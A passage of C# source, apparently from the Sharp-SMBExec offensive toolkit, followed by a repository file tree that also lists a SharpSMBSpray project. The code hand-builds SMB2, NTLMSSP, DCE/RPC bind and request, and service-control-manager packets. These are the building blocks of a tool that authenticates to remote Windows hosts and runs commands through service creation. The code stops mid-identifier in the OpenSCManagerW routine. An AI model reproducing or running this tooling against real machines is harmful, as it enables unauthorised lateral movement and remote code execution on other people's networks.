packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_DialectCount", new byte[] { 0x02, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_SecurityMode", new byte[] { 0x01, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved", new byte[] { 0x00, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Capabilities", new byte[] { 0x40, 0x00, 0x00, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_ClientGUID", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextCount", new byte[] { 0x00, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved2", new byte[] { 0x00, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect", new byte[] { 0x02, 0x02 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect2", new byte[] { 0x10, 0x02 });
return packet_SMB2NegotiateProtocolRequest;
}
public static OrderedDictionary SMB2SessionSetupRequest(byte[] packet_security_blob)
{
byte[] packet_security_blob_length = BitConverter.GetBytes(packet_security_blob.Length);
byte[] packet_security_blob_length2 = { packet_security_blob_length[0], packet_security_blob_length[1] };
OrderedDictionary packet_SMB2SessionSetupRequest = new OrderedDictionary();
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_StructureSize", new byte[] { 0x19, 0x00 });
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Flags", new byte[] { 0x00 });
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityMode", new byte[] { 0x01 });
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Capabilities", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Channel", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferOffset", new byte[] { 0x58, 0x00 });
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferLength", packet_security_blob_length2);
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_PreviousSessionID", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Buffer", packet_security_blob);
return packet_SMB2SessionSetupRequest;
}
public static OrderedDictionary SMB2TreeConnectRequest(byte[] packet_path)
{
byte[] packet_path_length = BitConverter.GetBytes(packet_path.Length);
packet_path_length = new byte[] { packet_path_length[0], packet_path_length[1] };
OrderedDictionary packet_SMB2TreeConnectRequest = new OrderedDictionary();
packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_StructureSize", new byte[] { 0x09, 0x00 });
packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Reserved", new byte[] { 0x00, 0x00 });
packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathOffset", new byte[] { 0x48, 0x00 });
packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathLength", packet_path_length);
packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Buffer", packet_path);
return packet_SMB2TreeConnectRequest;
}
public static OrderedDictionary SMB2CreateRequestFile(byte[] packet_named_pipe)
{
byte[] packet_named_pipe_length = BitConverter.GetBytes(packet_named_pipe.Length);
byte[] packet_named_pipe_length2 = { packet_named_pipe_length[0], packet_named_pipe_length[1] };
OrderedDictionary packet_SMB2CreateRequestFile = new OrderedDictionary();
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_StructureSize", new byte[] { 0x39, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Flags", new byte[] { 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_RequestedOplockLevel", new byte[] { 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Impersonation", new byte[] { 0x02, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_SMBCreateFlags", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Reserved", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_DesiredAccess", new byte[] { 0x03, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_FileAttributes", new byte[] { 0x80, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_ShareAccess", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateDisposition", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateOptions", new byte[] { 0x40, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameOffset", new byte[] { 0x78, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameLength", packet_named_pipe_length2);
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsLength", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Buffer", packet_named_pipe);
return packet_SMB2CreateRequestFile;
}
public static OrderedDictionary SMB2ReadRequest(byte[] packet_file_ID)
{
OrderedDictionary packet_SMB2ReadRequest = new OrderedDictionary();
packet_SMB2ReadRequest.Add("SMB2ReadRequest_StructureSize", new byte[] { 0x31, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_Padding", new byte[] { 0x50 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_Flags", new byte[] { 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_Length", new byte[] { 0x00, 0x00, 0x10, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_FileID", packet_file_ID);
packet_SMB2ReadRequest.Add("SMB2ReadRequest_MinimumCount", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_Channel", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_RemainingBytes", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoOffset", new byte[] { 0x00, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoLength", new byte[] { 0x00, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_Buffer", new byte[] { 0x30 });
return packet_SMB2ReadRequest;
}
public static OrderedDictionary SMB2WriteRequest(byte[] packet_file_ID, int packet_RPC_length)
{
byte[] packet_write_length = BitConverter.GetBytes(packet_RPC_length);
OrderedDictionary packet_SMB2WriteRequest = new OrderedDictionary();
packet_SMB2WriteRequest.Add("SMB2WriteRequest_StructureSize", new byte[] { 0x31, 0x00 });
packet_SMB2WriteRequest.Add("SMB2WriteRequest_DataOffset", new byte[] { 0x70, 0x00 });
packet_SMB2WriteRequest.Add("SMB2WriteRequest_Length", packet_write_length);
packet_SMB2WriteRequest.Add("SMB2WriteRequest_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMB2WriteRequest.Add("SMB2WriteRequest_FileID", packet_file_ID);
packet_SMB2WriteRequest.Add("SMB2WriteRequest_Channel", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2WriteRequest.Add("SMB2WriteRequest_RemainingBytes", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoOffset", new byte[] { 0x00, 0x00 });
packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoLength", new byte[] { 0x00, 0x00 });
packet_SMB2WriteRequest.Add("SMB2WriteRequest_Flags", new byte[] { 0x00, 0x00, 0x00, 0x00 });
return packet_SMB2WriteRequest;
}
public static OrderedDictionary SMB2CloseRequest(byte[] packet_file_ID)
{
OrderedDictionary packet_SMB2CloseRequest = new OrderedDictionary();
packet_SMB2CloseRequest.Add("SMB2CloseRequest_StructureSize", new byte[] { 0x18, 0x00 });
packet_SMB2CloseRequest.Add("SMB2CloseRequest_Flags", new byte[] { 0x00, 0x00 });
packet_SMB2CloseRequest.Add("SMB2CloseRequest_Reserved", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2CloseRequest.Add("SMB2CloseRequest_FileID", packet_file_ID);
return packet_SMB2CloseRequest;
}
public static OrderedDictionary SMB2TreeDisconnectRequest()
{
OrderedDictionary packet_SMB2TreeDisconnectRequest = new OrderedDictionary();
packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_StructureSize", new byte[] { 0x04, 0x00 });
packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_Reserved", new byte[] { 0x00, 0x00 });
return packet_SMB2TreeDisconnectRequest;
}
public static OrderedDictionary SMB2SessionLogoffRequest()
{
OrderedDictionary packet_SMB2SessionLogoffRequest = new OrderedDictionary();
packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_StructureSize", new byte[] { 0x04, 0x00 });
packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_Reserved", new byte[] { 0x00, 0x00 });
return packet_SMB2SessionLogoffRequest;
}
public static OrderedDictionary NTLMSSPNegotiate(byte[] packet_negotiate_flags, byte[] packet_version)
{
byte[] packet_NTLMSSP_length;
//There may be issues here, we will see.
if (packet_version != null)
{
packet_NTLMSSP_length = BitConverter.GetBytes(32 + packet_version.Length);
}
else
{
packet_NTLMSSP_length = BitConverter.GetBytes(32);
}
byte[] packet_NTLMSSP_length2 = { packet_NTLMSSP_length[0] };
int packet_ASN_length_1 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 32;
byte[] packet_ASN_length_1_2 = (BitConverter.GetBytes(packet_ASN_length_1));
int packet_ASN_length_2 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 22;
byte[] packet_ASN_length_2_2 = (BitConverter.GetBytes(packet_ASN_length_2));
int packet_ASN_length_3 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 20;
byte[] packet_ASN_length_3_2 = (BitConverter.GetBytes(packet_ASN_length_3));
int packet_ASN_length_4 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 2;
byte[] packet_ASN_length_4_2 = BitConverter.GetBytes(packet_ASN_length_4);
OrderedDictionary packet_NTLMSSPNegotiate = new OrderedDictionary();
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialContextTokenID", new byte[] { 0x60 }); // the ASN.1 key names are likely not all correct
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialcontextTokenLength", new byte[] { packet_ASN_length_1_2[0] });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechID", new byte[] { 0x06 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechLength", new byte[] { 0x06 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_OID", new byte[] { 0x2b, 0x06, 0x01, 0x05, 0x05, 0x02 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID", new byte[] { 0xa0 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength", new byte[] { packet_ASN_length_2_2[0] });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID2", new byte[] { 0x30 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength2", new byte[] { packet_ASN_length_3_2[0] });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID", new byte[] { 0xa0 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength", new byte[] { 0x0e });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID2", new byte[] { 0x30 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength2", new byte[] { 0x0c });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID3", new byte[] { 0x06 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength3", new byte[] { 0x0a });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechType", new byte[] { 0x2b, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x0a });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenID", new byte[] { 0xa2 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenLength", new byte[] { packet_ASN_length_4_2[0] });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPID", new byte[] { 0x04 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPLength", new byte[] { packet_NTLMSSP_length2[0] });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NegotiateFlags", packet_negotiate_flags);
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
if (packet_version != null)
{
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Version", packet_version);
}
return packet_NTLMSSPNegotiate;
}
public static OrderedDictionary NTLMSSPAuth(byte[] packet_NTLM_response)
{
byte[] packet_NTLMSSP_length = BitConverter.GetBytes(packet_NTLM_response.Length);
packet_NTLMSSP_length = new byte[] { packet_NTLMSSP_length[1], packet_NTLMSSP_length[0] };
byte[] packet_ASN_length_1 = BitConverter.GetBytes(packet_NTLM_response.Length + 12);
byte[] packet_ASN_length_1_2 = { packet_ASN_length_1[1], packet_ASN_length_1[0] };
byte[] packet_ASN_length_2 = BitConverter.GetBytes(packet_NTLM_response.Length + 8);
byte[] packet_ASN_length_2_2 = { packet_ASN_length_2[1], packet_ASN_length_2[0] };
byte[] packet_ASN_length_3 = BitConverter.GetBytes(packet_NTLM_response.Length + 4);
byte[] packet_ASN_length_3_2 = { packet_ASN_length_3[1], packet_ASN_length_3[0] };
OrderedDictionary packet_NTLMSSPAuth = new OrderedDictionary();
packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID", new byte[] { 0xa1, 0x82 });
packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength", packet_ASN_length_1_2);
packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID2", new byte[] { 0x30, 0x82 });
packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength2", packet_ASN_length_2_2);
packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID3", new byte[] { 0xa2, 0x82 });
packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength3", packet_ASN_length_3_2);
packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPID", new byte[] { 0x04, 0x82 });
packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPLength", packet_NTLMSSP_length);
packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMResponse", packet_NTLM_response);
return packet_NTLMSSPAuth;
}
public static OrderedDictionary RPCBind(int packet_call_ID, byte[] packet_max_frag, byte[] packet_num_ctx_items, byte[] packet_context_ID, byte[] packet_UUID, byte[] packet_UUID_version)
{
byte[] packet_call_ID_bytes = BitConverter.GetBytes(packet_call_ID);
OrderedDictionary packet_RPCBind = new OrderedDictionary();
packet_RPCBind.Add("RPCBind_Version", new byte[] { 0x05 });
packet_RPCBind.Add("RPCBind_VersionMinor", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_PacketType", new byte[] { 0x0b });
packet_RPCBind.Add("RPCBind_PacketFlags", new byte[] { 0x03 });
packet_RPCBind.Add("RPCBind_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_FragLength", new byte[] { 0x48, 0x00 });
packet_RPCBind.Add("RPCBind_AuthLength", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_CallID", packet_call_ID_bytes);
packet_RPCBind.Add("RPCBind_MaxXmitFrag", new byte[] { 0xb8, 0x10 });
packet_RPCBind.Add("RPCBind_MaxRecvFrag", new byte[] { 0xb8, 0x10 });
packet_RPCBind.Add("RPCBind_AssocGroup", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_NumCtxItems", packet_num_ctx_items);
packet_RPCBind.Add("RPCBind_Unknown", new byte[] { 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_ContextID", packet_context_ID);
packet_RPCBind.Add("RPCBind_NumTransItems", new byte[] { 0x01 });
packet_RPCBind.Add("RPCBind_Unknown2", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_Interface", packet_UUID);
packet_RPCBind.Add("RPCBind_InterfaceVer", packet_UUID_version);
packet_RPCBind.Add("RPCBind_InterfaceVerMinor", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_TransferSyntax", new byte[] { 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 });
packet_RPCBind.Add("RPCBind_TransferSyntaxVer", new byte[] { 0x02, 0x00, 0x00, 0x00 });
if (packet_num_ctx_items[0] == 2)
{
packet_RPCBind.Add("RPCBind_ContextID2", new byte[] { 0x01, 0x00 });
packet_RPCBind.Add("RPCBind_NumTransItems2", new byte[] { 0x01 });
packet_RPCBind.Add("RPCBind_Unknown3", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_Interface2", new byte[] { 0xc4, 0xfe, 0xfc, 0x99, 0x60, 0x52, 0x1b, 0x10, 0xbb, 0xcb, 0x00, 0xaa, 0x00, 0x21, 0x34, 0x7a });
packet_RPCBind.Add("RPCBind_InterfaceVer2", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_InterfaceVerMinor2", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_TransferSyntax2", new byte[] { 0x2c, 0x1c, 0xb7, 0x6c, 0x12, 0x98, 0x40, 0x45, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_TransferSyntaxVer2", new byte[] { 0x01, 0x00, 0x00, 0x00 });
}
else if (packet_num_ctx_items[0] == 3)
{
packet_RPCBind.Add("RPCBind_ContextID2", new byte[] { 0x01, 0x00 });
packet_RPCBind.Add("RPCBind_NumTransItems2", new byte[] { 0x01 });
packet_RPCBind.Add("RPCBind_Unknown3", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_Interface2", new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
packet_RPCBind.Add("RPCBind_InterfaceVer2", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_InterfaceVerMinor2", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_TransferSyntax2", new byte[] { 0x33, 0x05, 0x71, 0x71, 0xba, 0xbe, 0x37, 0x49, 0x83, 0x19, 0xb5, 0xdb, 0xef, 0x9c, 0xcc, 0x36 });
packet_RPCBind.Add("RPCBind_TransferSyntaxVer2", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_ContextID3", new byte[] { 0x02, 0x00 });
packet_RPCBind.Add("RPCBind_NumTransItems3", new byte[] { 0x01 });
packet_RPCBind.Add("RPCBind_Unknown4", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_Interface3", new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
packet_RPCBind.Add("RPCBind_InterfaceVer3", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_InterfaceVerMinor3", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_TransferSyntax3", new byte[] { 0x2c, 0x1c, 0xb7, 0x6c, 0x12, 0x98, 0x40, 0x45, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_TransferSyntaxVer3", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_AuthType", new byte[] { 0x0a });
packet_RPCBind.Add("RPCBind_AuthLevel", new byte[] { 0x04 });
packet_RPCBind.Add("RPCBind_AuthPadLength", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_AuthReserved", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_ContextID4", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
packet_RPCBind.Add("RPCBind_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_NegotiateFlags", new byte[] { 0x97, 0x82, 0x08, 0xe2 });
packet_RPCBind.Add("RPCBind_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_OSVersion", new byte[] { 0x06, 0x01, 0xb1, 0x1d, 0x00, 0x00, 0x00, 0x0f });
}
if (packet_call_ID == 3)
{
packet_RPCBind.Add("RPCBind_AuthType", new byte[] { 0x0a });
packet_RPCBind.Add("RPCBind_AuthLevel", new byte[] { 0x02 });
packet_RPCBind.Add("RPCBind_AuthPadLength", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_AuthReserved", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_ContextID3", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
packet_RPCBind.Add("RPCBind_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_NegotiateFlags", new byte[] { 0x97, 0x82, 0x08, 0xe2 });
packet_RPCBind.Add("RPCBind_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_OSVersion", new byte[] { 0x06, 0x01, 0xb1, 0x1d, 0x00, 0x00, 0x00, 0x0f });
}
return packet_RPCBind;
}
public static OrderedDictionary RPCRequest(byte[] packet_flags, int packet_service_length, int packet_auth_length, int packet_auth_padding, byte[] packet_call_ID, byte[] packet_context_ID, byte[] packet_opnum, byte[] packet_data)
{
int packet_full_auth_length;
byte[] packet_write_length;
byte[] packet_alloc_hint;
if (packet_auth_length > 0)
{
packet_full_auth_length = packet_auth_length + packet_auth_padding + 8;
}
else
{
packet_full_auth_length = 0;
}
if (packet_data != null)
{
packet_write_length = BitConverter.GetBytes(packet_service_length + 24 + packet_full_auth_length + packet_data.Length);
packet_alloc_hint = BitConverter.GetBytes(packet_service_length + packet_data.Length);
}
else
{
packet_write_length = BitConverter.GetBytes(packet_service_length + 24 + packet_full_auth_length);
packet_alloc_hint = BitConverter.GetBytes(packet_service_length);
}
byte[] packet_frag_length = { packet_write_length[0], packet_write_length[1] };
byte[] packet_auth_length2 = BitConverter.GetBytes(packet_auth_length);
byte[] packet_auth_length3 = { packet_auth_length2[0], packet_auth_length2[1] };
OrderedDictionary packet_RPCRequest = new OrderedDictionary();
packet_RPCRequest.Add("RPCRequest_Version", new byte[] { 0x05 });
packet_RPCRequest.Add("RPCRequest_VersionMinor", new byte[] { 0x00 });
packet_RPCRequest.Add("RPCRequest_PacketType", new byte[] { 0x00 });
packet_RPCRequest.Add("RPCRequest_PacketFlags", packet_flags);
packet_RPCRequest.Add("RPCRequest_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 });
packet_RPCRequest.Add("RPCRequest_FragLength", packet_frag_length);
packet_RPCRequest.Add("RPCRequest_AuthLength", packet_auth_length3);
packet_RPCRequest.Add("RPCRequest_CallID", packet_call_ID);
packet_RPCRequest.Add("RPCRequest_AllocHint", packet_alloc_hint);
packet_RPCRequest.Add("RPCRequest_ContextID", packet_context_ID);
packet_RPCRequest.Add("RPCRequest_Opnum", packet_opnum);
if (packet_data != null && packet_data.Length > 0)
{
packet_RPCRequest.Add("RPCRequest_Data", packet_data);
}
return packet_RPCRequest;
}
//Look into to see if this can be simplified with what we already have.
public static OrderedDictionary SCMOpenSCManagerW(byte[] packet_service, byte[] packet_service_length)
{
byte[] packet_write_length = BitConverter.GetBytes(packet_service.Length + 92);
byte[] packet_frag_length = { packet_write_length[0], packet_write_length[1] };
byte[] packet_alloc_hint = BitConverter.GetBytes(packet_service.Length + 68);
Random r = new Random();
byte[] packet_referent_init = new byte[2];
r.NextBytes(packet_referent_init);
byte[] packet_referent_ID1 = packet_referent_init.Concat(new byte[] { 0x00, 0x00 }).ToArray();
byte[] packet_referent_init2 = new byte[2];
r.NextBytes(packet_referent_init2);
byte[] packet_referent_ID2 = packet_referent_init2.Concat(new byte[] { 0x00, 0x00 }).ToArray();
OrderedDictionary packet_SCMOpenSCManagerW = new OrderedDictionary();
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ReferentID", packet_referent_ID1);
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_MaxCount", packet_service_length);
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ActualCount", packet_service_length);
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName", packet_service);
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Da
gitextract_suu4eg2e/
├── .gitattributes
├── .gitignore
├── LICENSE
├── README.md
├── Sharp-SMBExec/
│ ├── .gitattributes
│ ├── .gitignore
│ ├── README.md
│ ├── SharpInvoke-SMBExec/
│ │ ├── App.config
│ │ ├── ArgParse.cs
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── SMBExec.cs
│ │ ├── SharpInvoke-SMBExec.csproj
│ │ ├── Utilities.cs
│ │ └── packages.config
│ └── SharpInvoke-SMBExec.sln
└── SharpSMBSpray/
├── SharpSMBSpray/
│ ├── FodyWeavers.xml
│ ├── FodyWeavers.xsd
│ ├── Program.cs
│ ├── Properties/
│ │ └── AssemblyInfo.cs
│ ├── SharpSMBSpray.csproj
│ └── packages.config
├── SharpSMBSpray.sln
└── packages/
├── Costura.Fody.4.1.0/
│ ├── .signature.p7s
│ ├── Costura.Fody.4.1.0.nupkg
│ ├── build/
│ │ └── Costura.Fody.props
│ ├── lib/
│ │ └── net40/
│ │ └── Costura.xml
│ └── weaver/
│ └── Costura.Fody.xcf
├── Fody.6.0.0/
│ ├── .signature.p7s
│ ├── Fody.6.0.0.nupkg
│ ├── build/
│ │ └── Fody.targets
│ ├── netclassictask/
│ │ ├── Mono.Cecil.Pdb.pdb
│ │ ├── Mono.Cecil.Rocks.pdb
│ │ └── Mono.Cecil.pdb
│ └── netstandardtask/
│ ├── Mono.Cecil.Pdb.pdb
│ ├── Mono.Cecil.Rocks.pdb
│ └── Mono.Cecil.pdb
├── IPNetwork.1.3.2.0/
│ ├── .signature.p7s
│ └── IPNetwork.1.3.2.0.nupkg
└── NDesk.Options.0.2.1/
├── .signature.p7s
└── NDesk.Options.0.2.1.nupkg
SYMBOL INDEX (49 symbols across 5 files)
